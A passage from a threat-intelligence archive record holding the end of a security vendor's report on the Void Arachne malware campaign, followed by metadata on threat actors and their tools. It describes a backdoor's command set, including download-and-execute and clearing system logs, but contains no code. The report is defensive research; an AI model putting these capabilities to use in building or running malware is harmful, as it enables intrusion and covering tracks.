It can execute a variety of tasks, including\r\nloading additional plugins, capturing screenshots, and clearing system logs. These functions are managed and executed\r\nthrough controlled switch statements, ensuring precise and efficient handling of each instruction.\r\nTable 7 lists the malware’s supported functionalities.\r\nCommand Description\r\n0 Load plugins\r\n1 Load the plugin and update the registry\r\n2 Terminate the connection\r\n3 Send the active window information and capture a screenshot\r\n4 Capture a screenshot\r\n5 Execute file and commands\r\n6 Download a file from the given URL and execute it\r\n7 Modify the registry value of specific keys and, if the key doesn’t exist, create it\r\n8 Check whether a process with the provided name exists on the system by enumerating the list of running processes\r\n9 N/A\r\n10 Capture a screenshot\r\n11 Clear system logs: Application, security, and system\r\n12 Restart the process\r\n13 Terminate the process\r\n14 Log out from the system\r\n15 Restart the system\r\n16 Shut down the system\r\n17 Change the default plugin loading method\r\n18 Update configuration settings\r\n19 Create a new C\u0026C thread and perform system information collection\r\n100 Set the IpDatespecial registry value\r\n101 Remove the IpDatespecial registry value\r\nTable 7. A list of the malware’s supported functionalities\r\nConclusion\r\nIn the scope of our research, we conducted an analysis of a Void Arachne campaign that targets the Chinese-speaking\r\ndemographic. 
Using SEO poisoning and widely used messaging applications such as Telegram, the Void Arachne threat\r\ngroup has potentially reached a substantial Chinese-speaking demographic as well as the broader East Asian community\r\nthrough the dissemination of malicious MSI files.\r\nAs is the case with Void Arachne’s campaign, threat actors abused the great public interest in AI technologies to deliver\r\nmalware. Our investigation revealed that Void Arachne promoted compromised MSI files embedded with nudifiers and\r\ndeepfake pornography-generating software, intending to infect unsuspecting users. Furthermore, the group advertised\r\ncorrupted AI voice and facial technologies, frequently exploited in virtual kidnapping schemes. The proliferation of these\r\nartificial technologies has prompted concerns regarding potential misuse, particularly evident in sextortion and virtual\r\nkidnapping schemes that can lead to heartbreaking consequences. In its commitment to safeguarding the general\r\npublic’s online well-being, Trend Micro has curated comprehensive resources designed to educate the community on\r\nidentifying, preventing, and addressing sextortion attacks. In the event of falling victim to sextortion or virtual kidnapping,\r\nthe prompt reporting of the incident to relevant authorities, such as the Internet Crime Complaint Center (IC3), is strongly\r\nrecommended.\r\nThroughout 2024, we have seen an increase in malicious MSI files, such as in a DarkGate campaign that exploited the\r\nMicrosoft Windows Internet Shortcut SmartScreen Bypass Vulnerability (CVE-2024-21412). Individuals are strongly\r\nadvised to check the source of MSI files and only download them from trusted sources. As previously discussed, MSI files\r\nare bundled installers, which means that malicious software as well as zero-day exploits can be bundled alongside legitimate\r\nsoftware. 
These malicious MSI files pose a significant threat to organizations as they may act as a backdoored installer and\r\npoison the software installer supply chain.\r\nOrganizations can protect themselves from these kinds of attacks with the Trend Vision One platform, which enables\r\nsecurity teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets.\r\nVision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers critical factors,\r\nsuch as the likelihood and impact of potential attacks, and offers a range of prevention, detection, and response capabilities.\r\nThis is all backed by advanced threat research, threat intelligence, and AI, which helps reduce the time taken to detect,\r\nrespond, and remediate issues. Ultimately, Trend Vision One can help improve the overall security posture and effectiveness\r\nof an organization, including defending an organization against zero-day attacks.\r\nWhen faced with uncertain intrusions, behaviors, and routines, organizations should assume that their system is already\r\ncompromised or breached and work to immediately isolate affected data or toolchains. With a broader perspective and rapid\r\nresponse, organizations can address breaches and protect their remaining systems, especially with technologies such as\r\nTrend Micro™ Endpoint Security™ and Trend Micro Network Security, as well as comprehensive\r\nsecurity solutions such as Trend Micro™ Security Operations, which can detect, scan, and block malicious\r\ncontent across the modern threat landscape.\r\nThe complete list of indicators of compromise (IoCs) can be found here. 
\r\nSource: https://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html"
	],
	"report_names": [
		"behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8f68387a-aced-4c99-b2a6-aa85071a0ca3",
			"created_at": "2024-06-25T02:00:05.030976Z",
			"updated_at": "2026-04-10T02:00:03.656871Z",
			"deleted_at": null,
			"main_name": "Void Arachne",
			"aliases": [
				"Silver Fox"
			],
			"source_name": "MISPGALAXY:Void Arachne",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a7805d1a-b8d0-4a42-ae86-1d8711e0b2b9",
			"created_at": "2024-08-28T02:02:09.729503Z",
			"updated_at": "2026-04-10T02:00:04.967533Z",
			"deleted_at": null,
			"main_name": "Void Arachne",
			"aliases": [
				"Silver Fox"
			],
			"source_name": "ETDA:Void Arachne",
			"tools": [
				"Gh0stBins",
				"Gh0stCringe",
				"HoldingHands RAT",
				"Winos"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434712,
	"ts_updated_at": 1775791746,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/559df6500e93585b43c1e49e675474634efd3d61.pdf",
		"text": "https://archive.orkl.eu/559df6500e93585b43c1e49e675474634efd3d61.txt",
		"img": "https://archive.orkl.eu/559df6500e93585b43c1e49e675474634efd3d61.jpg"
	}
}